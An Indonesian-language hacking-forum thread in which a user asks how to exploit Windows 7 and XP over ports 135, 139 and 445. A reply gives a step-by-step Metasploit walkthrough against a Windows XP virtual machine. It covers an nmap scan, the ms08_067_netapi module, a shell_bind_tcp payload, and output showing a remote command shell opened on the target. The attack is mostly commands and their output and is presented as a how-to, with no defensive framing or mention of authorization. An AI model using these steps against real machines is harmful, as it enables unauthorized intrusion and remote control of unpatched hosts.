[Ask] Cara Exploit Win 7 & Win XP
#2
(07-28-2013, 01:53 AM)Arief.Kresna Wrote: Tanya :
cara Exploit Windows 7 & Windows XP port 135, 139 sama 445 itu pake Exploit & payload apa aja ya?
saya pake Exploit windows/smb/ms08_067_netapi ke Windows 7 sama Windows XP kok muncul ini terus ya?
[-] Exploit failed [no-target]: No matching target
saya udah set TARGET 0 (Target Auto)

Mohon Bantuan nya :-bd

Ane jawab untuk yang windows XP dengan Port 445 ,,
Check it out .. :v

Jadi port 445 merupakan port untuk TCP Microsoft-DS Active Directory windows Shares..

Oke langsung aja ,,

qta lihat dlu target vurn dimana mana ? port apa saja yang terbuka .. dengan cara nmap sederhana .

Code:
sudo nmap 192.168.56.102

hasilnya seperti ini ..
Quote:[*] exec: sudo nmap 192.168.56.102


Starting Nmap 6.01 ( http://nmap.org ) at 2013-07-28 10:03 WIT
Nmap scan report for 192.168.56.102
Host is up (0.0018s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
MAC Address: 08:00:27:0B:42:49 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds

Nah untuk port 3389 .. itu karena ane aktifin ,, kalo belum diaktifin kita pake port 445 ,, :v

setelah ketemu port 445 ternyata open . bener kata om aries ,, kita hanya menggunakan windows/smb/ms08_067_netapi

okeh kita masuk saja ..
Code:
use windows/smb/ms08_067_netapi
setting remote host nya ..
Code:
set rhost 192.168.56.102

setting payloadnya ,, qta pake payload windows/shell_bind_tcp
Code:
set payload windows/shell_bind_tcp

terakhir qta exploit
Code:
exploit

dan bingo .:v

Quote:[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.56.1:56838 -> 192.168.56.102:4444) at 2013-07-28 10:13:06 +0700

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


CMIIW

*ini ane coba di Virtual box .. :v jaringan lokal . :v :s:-:s:-:s:-:s:-:s:-:s:-
Nothing Impossible | Learn, Understand, Share | We Are Staff of Expert Zone Technology


Messages In This Thread
Cara Exploit Win 7 & Win XP - by Arief.Kresna - 07-28-2013, 01:53 AM
RE: ASK : Cara Exploit Win 7 & Win XP - by ino_ot - 07-28-2013, 11:14 AM
RE: ASK : Cara Exploit Win 7 & Win XP - by ino_ot - 07-28-2013, 09:57 PM
RE: ASK : Cara Exploit Win 7 & Win XP - by ino_ot - 07-28-2013, 10:53 PM




Users browsing this thread: 1 Guest(s)